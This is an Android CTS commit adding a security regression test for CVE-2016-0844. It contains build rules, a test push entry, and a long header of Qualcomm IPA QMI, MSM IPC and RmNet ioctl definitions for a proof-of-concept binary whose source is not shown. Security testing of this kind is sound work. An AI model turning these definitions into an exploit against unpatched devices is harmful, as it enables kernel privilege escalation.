author | manish <manish.pandey2@harman.corp-partner.google.com> | 2018-03-20 12:42:52 +0530 |
committer | Pradeep Chenthati <pchenthati@google.com> | 2018-06-08 18:07:26 +0000 |
commit | e2fd58d679ecfc7254633d1e3813a0e38a37bad1 (patch) | |
tree | 6dbcebeb7d87b9abf21be228d32c020241a6caed | |
parent | 90c9516a195fe68bf9070a68ac6e4be06bc5f4c3 (diff) | |
[RESTRICT AUTOMERGE]: CTS test for Android Security b/72509609 b/26324307
Test: successful run of newly introduced CTS test case.
Bug: 72509609
Bug: 26324307
Change-Id: I02fff0d3522b291b74c5a1a6c7ca6c7dfd8368a2
Signed-off-by: manish <manish.pandey2@harman.corp-partner.google.com>
(cherry picked from commit cac61d428a1c1cd42fd994f4acdb9a7d5414aead)
5 files changed, 741 insertions, 0 deletions
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 28699b99257..6fdd84042a7 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -44,6 +44,7 @@
 <!--__________________-->
 <!-- Bulletin 2016-04 -->
 <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
 <option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
 <!-- Bulletin 2016-05 -->
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk
new file mode 100644
index 00000000000..19585cc7132
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk
@@ -0,0 +1,33 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-0844
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h
new file mode 100644
index 00000000000..960c9df9d87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h
@@ -0,0 +1,620 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+#include <sys/types.h>
+#ifndef IPA_QMI_SERVICE_V01_H
+#define IPA_QMI_SERVICE_V01_H
+
+#define QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01 2
+#define QMI_IPA_MAX_FILTERS_V01 64
+
+#define IPA_INT_MAX ((int)(~0U >> 1))
+#define IPA_INT_MIN (-IPA_INT_MAX - 1)
+
+enum ipa_qmi_result_type_v01 {
+ IPA_QMI_RESULT_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+ IPA_QMI_RESULT_SUCCESS_V01 = 0,
+ IPA_QMI_RESULT_FAILURE_V01 = 1,
+ IPA_QMI_RESULT_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+enum ipa_qmi_error_type_v01 {
+ IPA_QMI_ERROR_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+ IPA_QMI_ERR_NONE_V01 = 0x0000,
+ IPA_QMI_ERR_MALFORMED_MSG_V01 = 0x0001,
+ IPA_QMI_ERR_NO_MEMORY_V01 = 0x0002,
+ IPA_QMI_ERR_INTERNAL_V01 = 0x0003,
+ IPA_QMI_ERR_CLIENT_IDS_EXHAUSTED_V01 = 0x0005,
+ IPA_QMI_ERR_INVALID_ID_V01 = 0x0029,
+ IPA_QMI_ERR_ENCODING_V01 = 0x003A,
+ IPA_QMI_ERR_INCOMPATIBLE_STATE_V01 = 0x005A,
+ IPA_QMI_ERR_NOT_SUPPORTED_V01 = 0x005E,
+ IPA_QMI_ERROR_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+struct ipa_qmi_response_type_v01 {
+ enum ipa_qmi_result_type_v01 result;
+ enum ipa_qmi_error_type_v01 error;
+};
+
+enum ipa_platform_type_enum_v01 {
+ IPA_PLATFORM_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PLATFORM_TYPE_INVALID_V01 = 0,
+ QMI_IPA_PLATFORM_TYPE_TN_V01 = 1,
+ QMI_IPA_PLATFORM_TYPE_LE_V01 = 2,
+ QMI_IPA_PLATFORM_TYPE_MSM_ANDROID_V01 = 3,
+ QMI_IPA_PLATFORM_TYPE_MSM_WINDOWS_V01 = 4,
+ QMI_IPA_PLATFORM_TYPE_MSM_QNX_V01 = 5,
+ IPA_PLATFORM_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_hdr_tbl_info_type_v01 {
+ uint32_t modem_offset_start;
+ uint32_t modem_offset_end;
+};
+
+struct ipa_route_tbl_info_type_v01 {
+ uint32_t route_tbl_start_addr;
+ uint32_t num_indices;
+};
+
+struct ipa_modem_mem_info_type_v01 {
+ uint32_t block_start_addr;
+ uint32_t size;
+};
+
+struct ipa_hdr_proc_ctx_tbl_info_type_v01 {
+ uint32_t modem_offset_start;
+ uint32_t modem_offset_end;
+};
+
+struct ipa_zip_tbl_info_type_v01 {
+ uint32_t modem_offset_start;
+ uint32_t modem_offset_end;
+};
+
+struct ipa_init_modem_driver_req_msg_v01 {
+ uint8_t platform_type_valid;
+ enum ipa_platform_type_enum_v01 platform_type;
+ uint8_t hdr_tbl_info_valid;
+ struct ipa_hdr_tbl_info_type_v01 hdr_tbl_info;
+ uint8_t v4_route_tbl_info_valid;
+ struct ipa_route_tbl_info_type_v01 v4_route_tbl_info;
+ uint8_t v6_route_tbl_info_valid;
+ struct ipa_route_tbl_info_type_v01 v6_route_tbl_info;
+ uint8_t v4_filter_tbl_start_addr_valid;
+ uint32_t v4_filter_tbl_start_addr;
+ uint8_t v6_filter_tbl_start_addr_valid;
+ uint32_t v6_filter_tbl_start_addr;
+ uint8_t modem_mem_info_valid;
+ struct ipa_modem_mem_info_type_v01 modem_mem_info;
+ uint8_t ctrl_comm_dest_end_pt_valid;
+ uint32_t ctrl_comm_dest_end_pt;
+ uint8_t is_ssr_bootup_valid;
+ uint8_t is_ssr_bootup;
+ uint8_t hdr_proc_ctx_tbl_info_valid;
+ struct ipa_hdr_proc_ctx_tbl_info_type_v01 hdr_proc_ctx_tbl_info;
+ uint8_t zip_tbl_info_valid;
+ struct ipa_zip_tbl_info_type_v01 zip_tbl_info;
+};
+
+struct ipa_init_modem_driver_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+ uint8_t ctrl_comm_dest_end_pt_valid;
+ uint32_t ctrl_comm_dest_end_pt;
+ uint8_t default_end_pt_valid;
+ uint32_t default_end_pt;
+};
+
+struct ipa_indication_reg_req_msg_v01 {
+ uint8_t master_driver_init_complete_valid;
+ uint8_t master_driver_init_complete;
+};
+
+struct ipa_indication_reg_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_master_driver_init_complt_ind_msg_v01 {
+ struct ipa_qmi_response_type_v01 master_driver_init_status;
+};
+
+struct ipa_ipfltr_range_eq_16_type_v01 {
+ uint8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+struct ipa_ipfltr_mask_eq_32_type_v01 {
+ uint8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+struct ipa_ipfltr_eq_16_type_v01 {
+ uint8_t offset;
+ uint16_t value;
+};
+
+struct ipa_ipfltr_eq_32_type_v01 {
+ uint8_t offset;
+ uint32_t value;
+};
+
+struct ipa_ipfltr_mask_eq_128_type_v01 {
+ uint8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+struct ipa_filter_rule_type_v01 {
+ uint16_t rule_eq_bitmap;
+ uint8_t tos_eq_present;
+ uint8_t tos_eq;
+ uint8_t protocol_eq_present;
+ uint8_t protocol_eq;
+ uint8_t num_ihl_offset_range_16;
+
+ struct ipa_ipfltr_range_eq_16_type_v01
+ ihl_offset_range_16[QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01];
+
+ uint8_t num_offset_meq_32;
+
+ struct ipa_ipfltr_mask_eq_32_type_v01
+ offset_meq_32[QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01];
+
+ uint8_t tc_eq_present;
+ uint8_t tc_eq;
+ uint8_t flow_eq_present;
+ uint32_t flow_eq;
+ uint8_t ihl_offset_eq_16_present;
+ struct ipa_ipfltr_eq_16_type_v01 ihl_offset_eq_16;
+ uint8_t ihl_offset_eq_32_present;
+ struct ipa_ipfltr_eq_32_type_v01 ihl_offset_eq_32;
+ uint8_t num_ihl_offset_meq_32;
+ struct ipa_ipfltr_mask_eq_32_type_v01
+ ihl_offset_meq_32[QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01];
+ uint8_t num_offset_meq_128;
+ struct ipa_ipfltr_mask_eq_128_type_v01
+ offset_meq_128[QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01];
+
+ uint8_t metadata_meq32_present;
+
+ struct ipa_ipfltr_mask_eq_32_type_v01 metadata_meq32;
+ uint8_t ipv4_frag_eq_present;
+};
+
+enum ipa_ip_type_enum_v01 {
+ IPA_IP_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_IP_TYPE_INVALID_V01 = 0,
+ QMI_IPA_IP_TYPE_V4_V01 = 1,
+ QMI_IPA_IP_TYPE_V6_V01 = 2,
+ QMI_IPA_IP_TYPE_V4V6_V01 = 3,
+ IPA_IP_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_filter_action_enum_v01 {
+ IPA_FILTER_ACTION_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_FILTER_ACTION_INVALID_V01 = 0,
+ QMI_IPA_FILTER_ACTION_SRC_NAT_V01 = 1,
+ QMI_IPA_FILTER_ACTION_DST_NAT_V01 = 2,
+ QMI_IPA_FILTER_ACTION_ROUTING_V01 = 3,
+ QMI_IPA_FILTER_ACTION_EXCEPTION_V01 = 4,
+ IPA_FILTER_ACTION_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_filter_spec_type_v01 {
+ uint32_t filter_spec_identifier;
+ enum ipa_ip_type_enum_v01 ip_type;
+ struct ipa_filter_rule_type_v01 filter_rule;
+ enum ipa_filter_action_enum_v01 filter_action;
+ uint8_t is_routing_table_index_valid;
+ uint32_t route_table_index;
+ uint8_t is_mux_id_valid;
+ uint32_t mux_id;
+};
+
+struct ipa_install_fltr_rule_req_msg_v01 {
+ uint8_t filter_spec_list_valid;
+ uint32_t filter_spec_list_len;
+ struct ipa_filter_spec_type_v01 filter_spec_list[QMI_IPA_MAX_FILTERS_V01];
+ uint8_t source_pipe_index_valid;
+ uint32_t source_pipe_index;
+ uint8_t num_ipv4_filters_valid;
+ uint32_t num_ipv4_filters;
+ uint8_t num_ipv6_filters_valid;
+ uint32_t num_ipv6_filters;
+ uint8_t xlat_filter_indices_list_valid;
+ uint32_t xlat_filter_indices_list_len;
+ uint32_t xlat_filter_indices_list[QMI_IPA_MAX_FILTERS_V01];
+};
+
+struct ipa_filter_rule_identifier_to_handle_map_v01 {
+ uint32_t filter_spec_identifier;
+ uint32_t filter_handle;
+};
+
+struct ipa_install_fltr_rule_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+ uint8_t filter_handle_list_valid;
+ uint32_t filter_handle_list_len;
+ struct ipa_filter_rule_identifier_to_handle_map_v01
+ filter_handle_list[QMI_IPA_MAX_FILTERS_V01];
+};
+
+struct ipa_filter_handle_to_index_map_v01 {
+ uint32_t filter_handle;
+ uint32_t filter_index;
+};
+
+struct ipa_fltr_installed_notif_req_msg_v01 {
+ uint32_t source_pipe_index;
+ enum ipa_qmi_result_type_v01 install_status;
+ uint32_t filter_index_list_len;
+ struct ipa_filter_handle_to_index_map_v01
+ filter_index_list[QMI_IPA_MAX_FILTERS_V01];
+
+ uint8_t embedded_pipe_index_valid;
+ uint32_t embedded_pipe_index;
+ uint8_t retain_header_valid;
+ uint8_t retain_header;
+ uint8_t embedded_call_mux_id_valid;
+ uint32_t embedded_call_mux_id;
+ uint8_t num_ipv4_filters_valid;
+ uint32_t num_ipv4_filters;
+ uint8_t num_ipv6_filters_valid;
+ uint32_t num_ipv6_filters;
+ uint8_t start_ipv4_filter_idx_valid;
+ uint32_t start_ipv4_filter_idx;
+ uint8_t start_ipv6_filter_idx_valid;
+ uint32_t start_ipv6_filter_idx;
+};
+
+struct ipa_fltr_installed_notif_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_enable_force_clear_datapath_req_msg_v01 {
+ uint32_t source_pipe_bitmask;
+ uint32_t request_id;
+ uint8_t throttle_source_valid;
+ uint8_t throttle_source;
+};
+
+struct ipa_enable_force_clear_datapath_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_disable_force_clear_datapath_req_msg_v01 {
+ uint32_t request_id;
+};
+
+struct ipa_disable_force_clear_datapath_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+enum ipa_peripheral_speed_enum_v01 {
+ IPA_PERIPHERAL_SPEED_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PER_USB_FS_V01 = 1,
+ QMI_IPA_PER_USB_HS_V01 = 2,
+ QMI_IPA_PER_USB_SS_V01 = 3,
+ IPA_PERIPHERAL_SPEED_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_pipe_mode_enum_v01 {
+ IPA_PIPE_MODE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PIPE_MODE_HW_V01 = 1,
+ QMI_IPA_PIPE_MODE_SW_V01 = 2,
+ IPA_PIPE_MODE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_peripheral_type_enum_v01 {
+ IPA_PERIPHERAL_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PERIPHERAL_USB_V01 = 1,
+ QMI_IPA_PERIPHERAL_HSIC_V01 = 2,
+ QMI_IPA_PERIPHERAL_PCIE_V01 = 3,
+ IPA_PERIPHERAL_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_config_req_msg_v01 {
+ uint8_t peripheral_type_valid;
+ enum ipa_peripheral_type_enum_v01 peripheral_type;
+ uint8_t hw_deaggr_supported_valid;
+ uint8_t hw_deaggr_supported;
+ uint8_t max_aggr_frame_size_valid;
+ uint32_t max_aggr_frame_size;
+ uint8_t ipa_ingress_pipe_mode_valid;
+ enum ipa_pipe_mode_enum_v01 ipa_ingress_pipe_mode;
+ uint8_t peripheral_speed_info_valid;
+ enum ipa_peripheral_speed_enum_v01 peripheral_speed_info;
+ uint8_t dl_accumulation_time_limit_valid;
+ uint32_t dl_accumulation_time_limit;
+ uint8_t dl_accumulation_pkt_limit_valid;
+ uint32_t dl_accumulation_pkt_limit;
+ uint8_t dl_accumulation_byte_limit_valid;
+ uint32_t dl_accumulation_byte_limit;
+ uint8_t ul_accumulation_time_limit_valid;
+ uint32_t ul_accumulation_time_limit;
+ uint8_t hw_control_flags_valid;
+ uint32_t hw_control_flags;
+ uint8_t ul_msi_event_threshold_valid;
+ uint32_t ul_msi_event_threshold;
+ uint8_t dl_msi_event_threshold_valid;
+ uint32_t dl_msi_event_threshold;
+};
+
+struct ipa_config_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+/*Service Message Definition*/
+#define QMI_IPA_INDICATION_REGISTER_REQ_V01 0x0020
+#define QMI_IPA_INDICATION_REGISTER_RESP_V01 0x0020
+#define QMI_IPA_INIT_MODEM_DRIVER_REQ_V01 0x0021
+#define QMI_IPA_INIT_MODEM_DRIVER_RESP_V01 0x0021
+#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_V01 0x0022
+#define QMI_IPA_INSTALL_FILTER_RULE_REQ_V01 0x0023
+#define QMI_IPA_INSTALL_FILTER_RULE_RESP_V01 0x0023
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_V01 0x0024
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_V01 0x0024
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0025
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0025
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0026
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0026
+#define QMI_IPA_CONFIG_REQ_V01 0x0027
+#define QMI_IPA_CONFIG_RESP_V01 0x0027
+
+/* add for max length*/
+#define QMI_IPA_INIT_MODEM_DRIVER_REQ_MAX_MSG_LEN_V01 98
+#define QMI_IPA_INIT_MODEM_DRIVER_RESP_MAX_MSG_LEN_V01 21
+#define QMI_IPA_INDICATION_REGISTER_REQ_MAX_MSG_LEN_V01 4
+#define QMI_IPA_INDICATION_REGISTER_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_INSTALL_FILTER_RULE_REQ_MAX_MSG_LEN_V01 11293
+#define QMI_IPA_INSTALL_FILTER_RULE_RESP_MAX_MSG_LEN_V01 523
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_MAX_MSG_LEN_V01 574
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_MAX_MSG_LEN_V01 7
+
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 18
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 7
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7
+
+#define QMI_IPA_CONFIG_REQ_MAX_MSG_LEN_V01 81
+#define QMI_IPA_CONFIG_RESP_MAX_MSG_LEN_V01 7
+/* Service Object Accessor */
+
+#endif /* IPA_QMI_SERVICE_V01_H */
+
+#ifndef _UAPI_MSM_IPC_H_
+#define _UAPI_MSM_IPC_H_
+
+#include <linux/ioctl.h>
+#include <linux/types.h>
+
+struct msm_ipc_port_addr {
+ uint32_t node_id;
+ uint32_t port_id;
+};
+
+struct msm_ipc_port_name {
+ uint32_t service;
+ uint32_t instance;
+};
+
+struct msm_ipc_addr {
+ unsigned char addrtype;
+ union {
+ struct msm_ipc_port_addr port_addr;
+ struct msm_ipc_port_name port_name;
+ } addr;
+};
+
+#define MSM_IPC_WAIT_FOREVER (~0) /* timeout for permanent subscription */
+
+#ifndef AF_MSM_IPC
+#define AF_MSM_IPC 27
+#endif
+
+#ifndef PF_MSM_IPC
+#define PF_MSM_IPC AF_MSM_IPC
+#endif
+
+#define MSM_IPC_ADDR_NAME 1
+#define MSM_IPC_ADDR_ID 2
+
+struct sockaddr_msm_ipc {
+ unsigned short family;
+ struct msm_ipc_addr address;
+ unsigned char reserved;
+};
+
+struct config_sec_rules_args {
+ int num_group_info;
+ uint32_t service_id;
+ uint32_t instance_id;
+ unsigned reserved;
+ gid_t group_id[0];
+};
+
+#define IPC_ROUTER_IOCTL_MAGIC (0xC3)
+
+#define IPC_ROUTER_IOCTL_GET_VERSION \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 0, unsigned int)
+
+#define IPC_ROUTER_IOCTL_GET_MTU _IOR(IPC_ROUTER_IOCTL_MAGIC, 1, unsigned int)
+
+#define IPC_ROUTER_IOCTL_LOOKUP_SERVER \
+ _IOWR(IPC_ROUTER_IOCTL_MAGIC, 2, struct sockaddr_msm_ipc)
+
+#define IPC_ROUTER_IOCTL_GET_CURR_PKT_SIZE \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 3, unsigned int)
+
+#define IPC_ROUTER_IOCTL_BIND_CONTROL_PORT \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 4, unsigned int)
+
+#define IPC_ROUTER_IOCTL_CONFIG_SEC_RULES \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 5, struct config_sec_rules_args)
+
+struct msm_ipc_server_info {
+ uint32_t node_id;
+ uint32_t port_id;
+ uint32_t service;
+ uint32_t instance;
+};
+
+struct server_lookup_args {
+ struct msm_ipc_port_name port_name;
+ int num_entries_in_array;
+ int num_entries_found;
+ uint32_t lookup_mask;
+ struct msm_ipc_server_info srv_info[0];
+};
+
+#endif
+
+#ifndef _UAPI_MSM_RMNET_H_
+#define _UAPI_MSM_RMNET_H_
+
+/* Bitmap macros for RmNET driver operation mode. */
+#define RMNET_MODE_NONE (0x00)
+#define RMNET_MODE_LLP_ETH (0x01)
+#define RMNET_MODE_LLP_IP (0x02)
+#define RMNET_MODE_QOS (0x04)
+#define RMNET_MODE_MASK \
+ (RMNET_MODE_LLP_ETH | RMNET_MODE_LLP_IP | RMNET_MODE_QOS)
+
+#define RMNET_IS_MODE_QOS(mode) ((mode & RMNET_MODE_QOS) == RMNET_MODE_QOS)
+#define RMNET_IS_MODE_IP(mode) ((mode & RMNET_MODE_LLP_IP) == RMNET_MODE_LLP_IP)
+
+enum rmnet_ioctl_cmds_e {
+ RMNET_IOCTL_SET_LLP_ETHERNET = 0x000089F1, /* Set Ethernet protocol */
+ RMNET_IOCTL_SET_LLP_IP = 0x000089F2, /* Set RAWIP protocol */
+ RMNET_IOCTL_GET_LLP = 0x000089F3, /* Get link protocol */
+ RMNET_IOCTL_SET_QOS_ENABLE = 0x000089F4, /* Set QoS header enabled */
+ RMNET_IOCTL_SET_QOS_DISABLE = 0x000089F5, /* Set QoS header disabled*/
+ RMNET_IOCTL_GET_QOS = 0x000089F6, /* Get QoS header state */
+ RMNET_IOCTL_GET_OPMODE = 0x000089F7, /* Get operation mode */
+ RMNET_IOCTL_OPEN = 0x000089F8, /* Open transport port */
+ RMNET_IOCTL_CLOSE = 0x000089F9, /* Close transport port */
+ RMNET_IOCTL_FLOW_ENABLE = 0x000089FA, /* Flow enable */
+ RMNET_IOCTL_FLOW_DISABLE = 0x000089FB, /* Flow disable */
+ RMNET_IOCTL_FLOW_SET_HNDL = 0x000089FC, /* Set flow handle */
+ RMNET_IOCTL_EXTENDED = 0x000089FD, /* Extended IOCTLs */
+ RMNET_IOCTL_MAX
+};
+
+enum rmnet_ioctl_extended_cmds_e {
+ /* RmNet Data Required IOCTLs */
+ RMNET_IOCTL_GET_SUPPORTED_FEATURES = 0x0000, /* Get features */
+ RMNET_IOCTL_SET_MRU = 0x0001, /* Set MRU */
+ RMNET_IOCTL_GET_MRU = 0x0002, /* Get MRU */
+ RMNET_IOCTL_GET_EPID = 0x0003, /* Get endpoint ID */
+ RMNET_IOCTL_GET_DRIVER_NAME = 0x0004, /* Get driver name */
+ RMNET_IOCTL_ADD_MUX_CHANNEL = 0x0005, /* Add MUX ID */
+ RMNET_IOCTL_SET_EGRESS_DATA_FORMAT = 0x0006, /* Set EDF */
+ RMNET_IOCTL_SET_INGRESS_DATA_FORMAT = 0x0007, /* Set IDF */
+ RMNET_IOCTL_SET_AGGREGATION_COUNT = 0x0008, /* Set agg count */
+ RMNET_IOCTL_GET_AGGREGATION_COUNT = 0x0009, /* Get agg count */
+ RMNET_IOCTL_SET_AGGREGATION_SIZE = 0x000A, /* Set agg size */
+ RMNET_IOCTL_GET_AGGREGATION_SIZE = 0x000B, /* Get agg size */
+ RMNET_IOCTL_FLOW_CONTROL = 0x000C, /* Do flow control */
+ RMNET_IOCTL_GET_DFLT_CONTROL_CHANNEL = 0x000D, /* For legacy use */
+ RMNET_IOCTL_GET_HWSW_MAP = 0x000E, /* Get HW/SW map */
+ RMNET_IOCTL_SET_RX_HEADROOM = 0x000F, /* RX Headroom */
+ RMNET_IOCTL_GET_EP_PAIR = 0x0010, /* Endpoint pair */
+ RMNET_IOCTL_SET_QOS_VERSION = 0x0011, /* 8/6 byte QoS hdr*/
+ RMNET_IOCTL_GET_QOS_VERSION = 0x0012, /* 8/6 byte QoS hdr*/
+ RMNET_IOCTL_GET_SUPPORTED_QOS_MODES = 0x0013, /* Get QoS modes */
+ RMNET_IOCTL_SET_SLEEP_STATE = 0x0014, /* Set sleep state */
+ RMNET_IOCTL_SET_XLAT_DEV_INFO = 0x0015, /* xlat dev name */
+ RMNET_IOCTL_EXTENDED_MAX = 0x0016
+};
+
+/* Return values for the RMNET_IOCTL_GET_SUPPORTED_FEATURES IOCTL */
+#define RMNET_IOCTL_FEAT_NOTIFY_MUX_CHANNEL (1 << 0)
+#define RMNET_IOCTL_FEAT_SET_EGRESS_DATA_FORMAT (1 << 1)
+#define RMNET_IOCTL_FEAT_SET_INGRESS_DATA_FORMAT (1 << 2)
+#define RMNET_IOCTL_FEAT_SET_AGGREGATION_COUNT (1 << 3)
+#define RMNET_IOCTL_FEAT_GET_AGGREGATION_COUNT (1 << 4)
+#define RMNET_IOCTL_FEAT_SET_AGGREGATION_SIZE (1 << 5)
+#define RMNET_IOCTL_FEAT_GET_AGGREGATION_SIZE (1 << 6)
+#define RMNET_IOCTL_FEAT_FLOW_CONTROL (1 << 7)
+#define RMNET_IOCTL_FEAT_GET_DFLT_CONTROL_CHANNEL (1 << 8)
+#define RMNET_IOCTL_FEAT_GET_HWSW_MAP (1 << 9)
+
+/* Input values for the RMNET_IOCTL_SET_EGRESS_DATA_FORMAT IOCTL */
+#define RMNET_IOCTL_EGRESS_FORMAT_MAP (1 << 1)
+#define RMNET_IOCTL_EGRESS_FORMAT_AGGREGATION (1 << 2)
+#define RMNET_IOCTL_EGRESS_FORMAT_MUXING (1 << 3)
+#define RMNET_IOCTL_EGRESS_FORMAT_CHECKSUM (1 << 4)
+
+/* Input values for the RMNET_IOCTL_SET_INGRESS_DATA_FORMAT IOCTL */
+#define RMNET_IOCTL_INGRESS_FORMAT_MAP (1 << 1)
+#define RMNET_IOCTL_INGRESS_FORMAT_DEAGGREGATION (1 << 2)
+#define RMNET_IOCTL_INGRESS_FORMAT_DEMUXING (1 << 3)
+#define RMNET_IOCTL_INGRESS_FORMAT_CHECKSUM (1 << 4)
+
+/* User space may not have this defined. */
+#ifndef IFNAMSIZ
+#define IFNAMSIZ 16
+#endif
+
+struct rmnet_ioctl_extended_s {
+ uint32_t extended_ioctl;
+ union {
+ uint32_t data; /* Generic data field for most extended IOCTLs */
+ int8_t if_name[IFNAMSIZ];
+ struct {
+ uint32_t mux_id;
+ int8_t vchannel_name[IFNAMSIZ];
+ } rmnet_mux_val;
+ struct {
+ uint8_t flow_mode;
+ uint8_t mux_id;
+ } flow_control_prop;
+ struct {
+ uint32_t consumer_pipe_num;
+ uint32_t producer_pipe_num;
+ } ipa_ep_pair;
+ } u;
+};
+
+struct rmnet_ioctl_data_s {
+ union {
+ uint32_t operation_mode;
+ uint32_t tcm_handle;
+ } u;
+};
+
+#define RMNET_IOCTL_QOS_MODE_6 (1 << 0)
+#define RMNET_IOCTL_QOS_MODE_8 (1 << 1)
+
+#define QMI_QOS_HDR_S __attribute((__packed__)) qmi_qos_hdr_s
+struct QMI_QOS_HDR_S {
+ unsigned char version;
+ unsigned char flags;
+ uint32_t flow_id;
+};
+
+struct qmi_qos_hdr8_s {
+ struct QMI_QOS_HDR_S hdr;
+ uint8_t reserved[2];
+} __attribute((__packed__));
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c
new file mode 100644
index 00000000000..12427684710
--- /dev/null
